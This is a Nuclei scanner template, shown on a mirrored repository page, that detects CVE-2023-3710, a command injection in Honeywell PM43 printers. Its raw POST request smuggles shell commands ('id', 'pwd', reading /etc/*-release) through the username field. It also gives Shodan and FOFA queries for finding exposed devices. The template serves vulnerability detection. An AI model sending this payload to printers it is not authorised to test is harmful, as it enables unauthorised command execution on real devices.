daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2023/CVE-2023-3710.yaml

56 lines
2.1 KiB
YAML
Raw Blame History

id: CVE-2023-3710
info:
name: Honeywell PM43 Printers - Command Injection
author: win3zz
severity: critical
description: |
Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006)
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-3710
- https://github.com/vpxuser/CVE-2023-3710-POC
- https://twitter.com/win3zz/status/1713451282344853634
- https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwaresignedP1019050004
- https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwarexasignedP1019050004A
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-3710
cwe-id: CWE-77,CWE-20
epss-score: 0.70969
epss-percentile: 0.98042
cpe: cpe:2.3:o:honeywell:pm43_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: honeywell
product: pm43_firmware
shodan-query: http.html:"/main/login.lua?pageid="
fofa-query: body="/main/login.lua?pageid="
tags: cve2023,cve,honeywell,pm43,printer,iot,rce
http:
- raw:
- |
POST /loadfile.lp?pageid=Configure HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)'
- type: word
part: body
words:
- 'Release date'
- type: status
status:
- 200
# digest: 4a0a0047304502205c5a80d771051373a8c6b0c2ca248ca734e5ee7408acfd6d2fb3c85902d221fb0221008f595d668911595afa24a9370d94dfb8fec9e8ce381ef47016acd2dc70a53914:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink